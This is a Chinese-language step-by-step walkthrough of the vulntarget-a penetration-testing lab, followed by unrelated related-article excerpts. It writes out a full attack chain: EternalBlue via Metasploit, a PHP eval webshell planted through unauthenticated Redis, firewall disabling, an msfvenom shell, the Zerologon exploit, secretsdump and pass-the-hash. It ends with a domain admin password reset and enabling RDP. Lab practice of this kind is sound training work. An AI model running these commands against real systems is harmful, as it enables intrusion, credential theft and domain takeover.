巨细巨细的白痴级vulntarget-a靶场wp再不会你打死我

ad一,靶场搭建

下载靶场:GitHub - crow821/vulntarget: vulntarget靶场系列

官方拓补图

 ps:此处 攻击机ip192.168.87.134,win7ip1为192.168.87.144

下载完毕后直接装入虚拟机不要进去,不要进去,不要进去

唯一 要修改的是网卡

设置虚拟网卡:默认为vmnet18和vmnet19

找到虚拟网卡编辑器

右下角点更改设置

同下图配置vmnet18

同理配置vmnet19

 

检查各设备的网卡设置

 

单机选设置打开窗口查看

win2019

 

Win11016

 

win7

 

配完去攻击机上访问win7ip看看能否访问,可以就表示配置完成

渗透开始 

信息收集(win7)

nmap  -sT 192.168.87.0/24

发现win7

访问 

查看开放了那些端口

nmap -sT --min-rate 10000 -p- 192.168.87.144 

发现开放了445端口,决定用永恒之蓝一把嗦

 输入msfconsole启动msf

clear

search ms17-010

use 0

set Rhost 192.168.87.144

run

 

进入meterperter成功拿下

win7信息收集

ipconfig

发现了c段位20的内网

 但别急先留个路由

run post/multi/manage/autoroute

 退回msf6(小白必看)

bg

back

这么做是为了保存session

搜索20c段的主机

使用arp_scanner模块

use post/windows/gather/arp_scanner
set session 1
set rhosts 10.0.20.0/24

 发现了99主机

使用socks_proxy做代理

use auxiliary/server/socks_proxy
set version 4a
run

修改etc/proxychains4.conf

vim /etc/proxychains4.conf

加上 socks4即可

esc:wq退出

使用proxychains4对10.0.20.99进行端口扫描

proxychains4 nmap -Pn -sT -p21,22,23,80-90,161,389,443,445,873,1099,1433,1521,1900,2082,2083,2222,2601,2604,3128,3306,3311,3312,3389,4440,4848,5432,5560,5900,5901,5902,6082,6379,7001-7010,7778,8080-8090,8649,8888,9000,9200,10000,11211,27017,28017,50000,50030,50060,135,139,445,53,88 10.0.20.99

看结果

扫到了 如上端口

开放了80端口访问一下phpinfo.php

ctrl f搜索root

发现了根目录路径

 使用redis未授权访问xieshell

注意kali不会自带redis使用要下载redis

redis下载

参考http://t.csdnimg.cn/FnwUE

proxychains4 redis-cli -h 10.0.20.99

进入目录写入shell

config set dir 'C:/phpStudy/PHPTutorial/WWW/'
config set dbfilename shell.php
set 1 "<?php @eval($_POST['cmd'])?>"
save

 用procychains4代理使用哥斯拉连接

哥斯拉下载

官网https://github.com/BeichenDream/Godzilla

下载jar包后拖入虚拟机使用

注意使用时要保证你处于jar包同更目录不然访问不到

以砖面为例

弹出界面即唱功

 点击target,选择add,如下填写

 添加唱功后enter进入

进入控制台

 关闭防火前以便于传shell

netsh advfirewall set allprofiles state off		

用msfvenom写一个shell 

msfvenom -p windows/x64/meterpreter/bind_tcp rhost=10.0.20.99 lport=4444 -f exe -o shell.exe

 可在桌面上发现

打开f哥斯拉的ilemanger 拖入上传

 打开控制台运行shell

.\shell.exe

 msf连接shell

成功

win2016信息收集

ipconfig发现10c段

加个路由先

run post/multi/manage/autoroute

 进shell继续星系收集

shell

Chcp 65001  #优化shell使用utf-8编码

systeminfo

发现了域 vulntarget.com

查看域控(有时不好使)

net group "Domain Controllers" /domain

发现域控win2019ping一下

ping -n 1 WIN2019

ip为 10.0.10.110

CVE-2020-1472上线域控

exp下载

地址https://github.com/VoidSec/CVE-2020-1472

下这个就行,放桌面

运行

proxychains4 python3 cve-2020-1472-exploit.py 域控主机名 域控IP
proxychains4 python3 cve-2020-1472-exploit.py WIN2019 10.0.10.110
不行的话
给他加个参数
proxychains4 python3 cve-2020-1472-exploit.py -n WIN2019 -t 10.0.10.110

获取hash

proxychains4 impacket-secretsdump vulntarget.com/win2019\$@10.0.10.110 -no-pass

 得到hash,wmiexec上线

proxychains4 impacket-wmiexec -hashes aad3b435b51404eeaad3b435b51404ee:9099d68602a60f007c227c4fa95fada6 ./administrator@10.0.10.110

成功

net user administrator p-0p-0p-0 /domain		#修改域控密码
netsh advfirewall set allprofiles state off		#关防火墙

#开3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

已完成不做演示,已经打穿

图形化连接域控

使用remmina

apt install -y remmina
或
dnf install -y remmina

启动

proxychains4 remmina

改下配置

连接

 

 

 

成功

修改一下窗口尺寸

点玩后ctrl加滚轮可对其缩放

但有时会遇到连接失败的问题

是3389打开与否问题

可尝试

 reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
  wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
  netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
  reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/668983.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

使用LLaMA-Factory微调大模型

使用LLaMA-Factory微调大模型 github 地址 https://github.com/hiyouga/LLaMA-Factory 搭建环境 git clone --depth 1 https://github.com/hiyouga/LLaMA-Factory.git cd LLaMA-Factory在 LLaMA-Factory 路径下 创建虚拟环境 conda create -p ./venv python3.10激活环境 c…

RabbiMQ怎么保证可靠性

RabbiMQ怎么保证可靠性 前言生产端问题解决方案代码验证 RabbitMQ问题消费端问题解决方案代码验证 总结 前言 RabbitMQ相信大家都非常熟悉了&#xff0c;今天咱们来聊聊怎么保证RabbitMQ的可靠性。 那什么时候会出现问题呢&#xff1f; 第一种是生产端出现的问题。我们向队列…

CTFHUB-信息泄露-目录遍历和PHPINFO

目录 目录遍历 PHPINFO 目录遍历 很简单&#xff0c;挨着把每个目录都点开看一下 发现2目录下有个 flag.txt 文件&#xff0c;点开发现了本关的flag PHPINFO 这关也很简单&#xff0c;进来之后是一个phpinfo页面&#xff0c;按 CTRL F键打开查询&#xff0c;输入flag&#…

成功解决“ypeError: An Integer Is Required”错误的全面指南

成功解决“ypeError: An Integer Is Required”错误的全面指南 &#x1f308; 欢迎莅临我的个人主页&#x1f448;这里是我深耕Python编程、机器学习和自然语言处理&#xff08;NLP&#xff09;领域&#xff0c;并乐于分享知识与经验的小天地&#xff01;&#x1f387; &#x…

【科研基础】证明积累

1-Bayesian Estimation (P317) Suppose that x = θ + ν w h e r e ν i s a n N ( 0 , σ ) random variable and θ is the value of a n N ( θ 0 , σ 0 ) random variable θ (Fig. 8-7). Find the bayesian estimate θ o f θ . \begin{align…

神经网络与深度学习——第6章 循环神经网络

本文讨论的内容参考自《神经网络与深度学习》https://nndl.github.io/ 第6章 循环神经网络 给网络增加记忆能力 延时神经网络 有外部输入的非线性自回归模型 循环神经网络 简单循环网络 循环神经网络的计算能力 循环神经网络的通用近似定理 图灵完备 应用到机器学习 序列到类…

用贪心算法计算十进制数转二进制数(小数部分)

在上一篇博文用贪心算法计算十进制数转二进制数&#xff08;整数部分&#xff09;-CSDN博客中&#xff0c;小编介绍了用贪心算法进行十进制整数转化为二进制数的操作步骤&#xff0c;那么有朋友问我&#xff0c;那十进制小数转二进制&#xff0c;可以用贪心算法来计算吗&#x…

支付系统对接商户

target&#xff1a;离开柬埔寨倒计时-214day 还是美女作为开篇 前言 昨天没有写文章&#xff0c;因为部门团建&#xff0c;我得去给他们画饼&#xff0c;说起来也真的是唏嘘&#xff0c;我一个已经都在计划着离开柬埔寨的人&#xff0c;昨天聚餐还一个个给他们描述未来的前景&a…

5G无线标准演进综述及新技术引入

摘 要 随着经济和社会的发展&#xff0c;5G业务越来越丰富多彩&#xff0c;1080P高清视频、裸眼3D、网联汽车、云手机等新业务、新终端对网络的要求也越来越高&#xff1b;另一方面&#xff0c;5G标准持续演进&#xff0c;在MIMO、载波聚合、移动性管理、uRLLC、切片、定位等方…

海思SD3403,SS928/926,hi3519dv500,hi3516dv500移植yolov7,yolov8(19)-Yolov10探索

YOLOv10 开源有几天了,看性能是比较强的,但是试过的一些人说没有YOLOv8好,实际效果以测试结果为准,这里创新点算是去掉了之前YOLO的NMS步骤,论文题目也说了NMS-Free,以此来提高小目标检测率,减少计算冗余,也没有NMS的计算时间提高实时性。 这个倒是让我看到了以后可以…

以sqlilabs靶场为例,讲解SQL注入攻击原理【18-24关】

【less-18】 打开时&#xff0c;获取了自己的IP地址。&#xff0c;通过分析源码知道&#xff0c;会将用户的user-agent作为参数记录到数据库中。 提交的是信息有user-Agent、IP、uname信息。 此时可以借助Burp Suite 工具&#xff0c;修改user_agent&#xff0c;实现sql注入。…

STM32之USART(串口)通信学习

1.通信接口 在开始通信之前&#xff0c;我们要了解什么是通信&#xff0c;通信就是将一个设备的数据传送到另一个设备。 同时按照双方规定的协议即通信协议&#xff0c;指定通信规则通信双方按照规则进行数据的收发。 应用场景&#xff1a;单片机的串口可以使单片机与单片机…

软件架构设计属性之5:可维护性属性分析与应用

文章目录 引言一、可维护性定义和重要性1.1 定义1.2 重要性 二、可维护性关键要素2.1 模块化2.2 单一职责2.3 低耦合2.4 高内聚2.5 抽象和封装2.6 实践建议 三、设计原则3.1 开闭原则3.2 依赖倒置原则3.3 评估方法3.4 挑战与解决方案 四、实战应用总结 引言 在当今数字化飞速发…

利用GNSS IMU集成提高车道级定位精度

准确的定位对于很多不同的事情都是至关重要的。导航系统可以引导我们去某个地方&#xff0c;自动驾驶汽车可以利用这些数据在道路上安全行驶。尽管全球导航卫星系统(GNSS)在定位方面非常出色&#xff0c;但它们可能并不总是提供最准确的车道水平事实。解决这个问题的一个有希望…

大模型对齐方法笔记四:针对领域问答来进行知识对齐方法KnowPAT

KnowPAT KnowPAT(Knowledgeable Preference AlignmenT) 出自2023年11月的论文《Knowledgeable Preference Alignment for LLMs in Domain-specific Question Answering》&#xff0c;主要针对领域问答来进行知识对齐。 在领域问答有两个挑战&#xff1a;希望输出满足用户的要…

15-通过JS代码处理窗口滚动条

selenium并不是万能的&#xff0c;页面上有些操作无法实现时&#xff0c;就需要借助JS代码来完成了。selenium提供了一个方法&#xff1a;execute_script()&#xff0c;可以执行JS脚本代码。 比如&#xff1a;当页面上的元素超过一屏后&#xff0c;想操作屏幕下方的元素&#x…

git报错prohibited by Gerrit: not permitted: update

git push报错&#xff1a; Push to refs/for/[branch] to create a review, or get Push rights to update the branch. Contact an administrator to fix the permissions (prohibited by Gerrit: not permitted: update)原因&#xff1a; 使用Gerrit代码审核时&#xff0c;本…

IsoBench:多模态基础模型性能的基准测试与优化

随着多模态基础模型的快速发展&#xff0c;如何准确评估这些模型在不同输入模态下的性能成为了一个重要课题。本文提出了IsoBench&#xff0c;一个基准数据集&#xff0c;旨在通过提供多种同构&#xff08;isomorphic&#xff09;表示形式的问题&#xff0c;来测试和评估多模态…

React-表单受控绑定

概念&#xff1a;使用React组件的状态&#xff08;useState&#xff09;控制表单的状态 1.准备一个React状态值 2.通过value属性绑定状态&#xff0c;通过onChange属性绑定状态同步的函数

Web自动化测试-掌握selenium工具用法,使用WebDriver测试Chrome/FireFox网页(Java

目录 一、在Eclipse中构建Maven项目 1.全局配置Maven 2.配置JDK路径 3.创建Maven项目 4.引入selenium-java依赖 二、Chrome自动化脚本编写 1.创建一个ChromeTest类 2.测试ChromeDriver 3.下载chromedriver驱动 4.在脚本中通过System.setProperty方法指定chromedriver的…